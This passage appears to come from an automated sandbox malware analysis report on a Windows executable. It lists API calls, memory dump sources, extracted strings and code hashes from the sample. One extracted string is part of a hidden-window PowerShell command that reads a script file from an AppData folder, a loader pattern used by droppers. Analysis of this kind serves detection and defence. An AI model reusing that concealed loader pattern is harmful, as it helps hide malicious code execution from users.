                                                  • -windowstyle hidden ; $limpiness=Get-Content 'C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\ravnemorens\Fr, xrefs: 00404B0B
                                                  • A, xrefs: 00404C15
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: -windowstyle hidden ; $limpiness=Get-Content 'C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\ravnemorens\Fr$: Completed$A$C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver$H/B
                                                  • API String ID: 2624150263-2375077688
                                                  • Opcode ID: 4cf00c73115f53cf57be461a99467e832b164710fce0f00c931b90381e9749c6
                                                  • Instruction ID: 96009b05525636a0bc85a96efb184481c484ec56fefee2337862baa2afa4bf02
                                                  • Opcode Fuzzy Hash: 4cf00c73115f53cf57be461a99467e832b164710fce0f00c931b90381e9749c6
                                                  • Instruction Fuzzy Hash: DDA173B1900209ABDB11AFA5CD45AEFB7B8EF84314F11843BF601B62D1D77C99418B6D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • DeleteFileW.KERNEL32(?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\87tBuE42ft.exe"), ref: 00405DB7
                                                  • lstrcatW.KERNEL32(00424F50,\*.*), ref: 00405DFF
                                                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405E22
                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,00424F50,?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\87tBuE42ft.exe"), ref: 00405E28
                                                  • FindFirstFileW.KERNEL32(00424F50,?,?,?,0040A014,?,00424F50,?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\87tBuE42ft.exe"), ref: 00405E38
                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405ED8
                                                  • FindClose.KERNEL32(00000000), ref: 00405EE7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: "C:\Users\user\Desktop\87tBuE42ft.exe"$POB$\*.*
                                                  • API String ID: 2035342205-3518358132
                                                  • Opcode ID: 88fab90b4d09f841b73ffa8c694d9561d74098d6fa298fea3dd8b0427bac771f
                                                  • Instruction ID: 5ad7ae4105776224b4bb644c15053e07d5ebc7bd6c5330578b1f64027da07968
                                                  • Opcode Fuzzy Hash: 88fab90b4d09f841b73ffa8c694d9561d74098d6fa298fea3dd8b0427bac771f
                                                  • Instruction Fuzzy Hash: 6F41D330400A15AACB21AB65CC49BBF7678EF41718F24417FF895B11C1D77C4A82DEAE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID:
                                                  • API String ID: 1974802433-0
                                                  • Opcode ID: 35be2cded6bbb6c19ef81b9061df306b7d760405464adce7e4c710930b842b0e
                                                  • Instruction ID: f0d7266373870d470beff65cac24d35b4a218527411e0b80208e5fb1e93adf0c
                                                  • Opcode Fuzzy Hash: 35be2cded6bbb6c19ef81b9061df306b7d760405464adce7e4c710930b842b0e
                                                  • Instruction Fuzzy Hash: 28F08271A04104AED701EBE4ED499AEB378EF14314F60057BE111F31E0D7B84E059B19
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetDlgItem.USER32(?,000003F9), ref: 00405086
                                                  • GetDlgItem.USER32(?,00000408), ref: 00405091
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 004050DB
                                                  • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004050F2
                                                  • SetWindowLongW.USER32(?,000000FC,0040567B), ref: 0040510B
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040511F
                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405131
                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00405147
                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405153
                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405165
                                                  • DeleteObject.GDI32(00000000), ref: 00405168
                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405193
                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040519F
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040523A
                                                  • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040526A
                                                    • Part of subcall function 00404636: SendMessageW.USER32(00000028,?,00000001,00404461), ref: 00404644
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040527E
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 004052AC
                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004052BA
                                                  • ShowWindow.USER32(?,00000005), ref: 004052CA
                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 004053C5
                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040542A
                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040543F
                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405463
                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405483
                                                  • ImageList_Destroy.COMCTL32(?), ref: 00405498
                                                  • GlobalFree.KERNEL32(?), ref: 004054A8
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405521
                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 004055CA
                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055D9
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00405604
                                                  • ShowWindow.USER32(?,00000000), ref: 00405652
                                                  • GetDlgItem.USER32(?,000003FE), ref: 0040565D
                                                  • ShowWindow.USER32(00000000), ref: 00405664
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $M$N
                                                  • API String ID: 2564846305-813528018
                                                  • Opcode ID: 324c1f4819b082b1ac23898fd696f3744d7b458a05ce4ad4b76fe224fda76cd4
                                                  • Instruction ID: 3eec0fee992af157883e3c32035e614d90e83c27d9cb298499668aae57dc4bf7
                                                  • Opcode Fuzzy Hash: 324c1f4819b082b1ac23898fd696f3744d7b458a05ce4ad4b76fe224fda76cd4
                                                  • Instruction Fuzzy Hash: B4029D70A00608EFDB20DF64CD45AAF7BB5FB44314F10857AE910BA2E0D7B98A42DF18
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040485E
                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404872
                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040488F
                                                  • GetSysColor.USER32(?), ref: 004048A0
                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004048AE
                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004048BC
                                                  • lstrlenW.KERNEL32(?), ref: 004048C1
                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004048CE
                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048E3
                                                  • GetDlgItem.USER32(?,0000040A), ref: 0040493C
                                                  • SendMessageW.USER32(00000000), ref: 00404943
                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040496E
                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004049B1
                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004049BF
                                                  • SetCursor.USER32(00000000), ref: 004049C2
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004049DB
                                                  • SetCursor.USER32(00000000), ref: 004049DE
                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404A0D
                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404A1F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                  • String ID: 7G@$: Completed$N
                                                  • API String ID: 3103080414-1841378378
                                                  • Opcode ID: b6dc2905c6216746abb3c0cd17d9c39e8b2e61a9098f8b336cb1d1698ee7a258
                                                  • Instruction ID: cd0ff63a31a53d86839c1a5ce07a34679cc09665db384d3569e6db54912acae5
                                                  • Opcode Fuzzy Hash: b6dc2905c6216746abb3c0cd17d9c39e8b2e61a9098f8b336cb1d1698ee7a258
                                                  • Instruction Fuzzy Hash: 9061B0B1A40209BFDB10AF64CD85EAA7B69FB84305F00843AF605B72D0D779AD51CF98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406463,?,?), ref: 00406303
                                                  • GetShortPathNameW.KERNEL32(?,004265E8,00000400), ref: 0040630C
                                                    • Part of subcall function 004060D7: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E7
                                                    • Part of subcall function 004060D7: lstrlenA.KERNEL32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406119
                                                  • GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 00406329
                                                  • wsprintfA.USER32 ref: 00406347
                                                  • GetFileSize.KERNEL32(00000000,00000000,00426DE8,C0000000,00000004,00426DE8,?,?,?,?,?), ref: 00406382
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406391
                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063C9
                                                  • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004261E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040641F
                                                  • GlobalFree.KERNEL32(00000000), ref: 00406430
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406437
                                                    • Part of subcall function 00406172: GetFileAttributesW.KERNELBASE(00000003,00403118,00437800,80000000,00000003), ref: 00406176
                                                    • Part of subcall function 00406172: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406198
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                  • String ID: %ls=%ls$[Rename]$eB$mB$mB
                                                  • API String ID: 2171350718-2529913679
                                                  • Opcode ID: db523023045b127196975f0173c88122861a3a00dd6e7a8812d5311d7169504c
                                                  • Instruction ID: 393dc7f902851ea198dcc63c4c4a9d42cf85fc1b4335f85fcc59b0ede2066cac
                                                  • Opcode Fuzzy Hash: db523023045b127196975f0173c88122861a3a00dd6e7a8812d5311d7169504c
                                                  • Instruction Fuzzy Hash: 35313571600325BBD2206B29AD49F6B3A6CDF41744F17003AF902F62D3DA7CD82686BC
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextW.USER32(00000000,00428A60,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: F
                                                  • API String ID: 941294808-1304234792
                                                  • Opcode ID: 9a1d1952d02a6587733a796de720c08d05f060e36ce2c67ddab1b612aed24319
                                                  • Instruction ID: 3c33d73dbc2ffdf14e434cca4ae815e9cfbd561affca8d3971a90777bf4c3be5
                                                  • Opcode Fuzzy Hash: 9a1d1952d02a6587733a796de720c08d05f060e36ce2c67ddab1b612aed24319
                                                  • Instruction Fuzzy Hash: 34418B71800249AFCF058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB34DA55DFA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\87tBuE42ft.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00406993
                                                  • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069A2
                                                  • CharNextW.USER32(?,"C:\Users\user\Desktop\87tBuE42ft.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069A7
                                                  • CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069BA
                                                  Strings
                                                  • *?|<>/":, xrefs: 00406982
                                                  • "C:\Users\user\Desktop\87tBuE42ft.exe", xrefs: 00406974
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00406931
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: "C:\Users\user\Desktop\87tBuE42ft.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 589700163-3285104665
                                                  • Opcode ID: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                  • Instruction ID: f71de53da442769783aaa0cb2fea73a85be5ebad64e4744dd58b15c84f46a956
                                                  • Opcode Fuzzy Hash: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                  • Instruction Fuzzy Hash: 2211C8A580021295DB303B548D40B7766F8AF59790F56403FED96B3AC1E77C4C9282BD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetWindowLongW.USER32(?,000000EB), ref: 00404685
                                                  • GetSysColor.USER32(00000000), ref: 004046C3
                                                  • SetTextColor.GDI32(?,00000000), ref: 004046CF
                                                  • SetBkMode.GDI32(?,?), ref: 004046DB
                                                  • GetSysColor.USER32(?), ref: 004046EE
                                                  • SetBkColor.GDI32(?,?), ref: 004046FE
                                                  • DeleteObject.GDI32(?), ref: 00404718
                                                  • CreateBrushIndirect.GDI32(?), ref: 00404722
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                  • Instruction ID: a82f55cf926b6e885627a74f3bab1bdd796941bf972b84b6a5e459a8b365bc4c
                                                  • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                  • Instruction Fuzzy Hash: 5C2177715007449BC7309F78DD48B577BF4AF42715B04893DEA96A36E0D738E944CB58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1
                                                    • Part of subcall function 00406253: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406269
                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                  • String ID: 9
                                                  • API String ID: 163830602-2366072709
                                                  • Opcode ID: 92e9fc4a2bdedd92fae86453cef36d5fd9ef34bcac34679d19d253eb0147ccd2
                                                  • Instruction ID: 4accc3969fe2a7d0a9ccf1f8c11f2542f9fe60139f427c4dffc821b6e73cd172
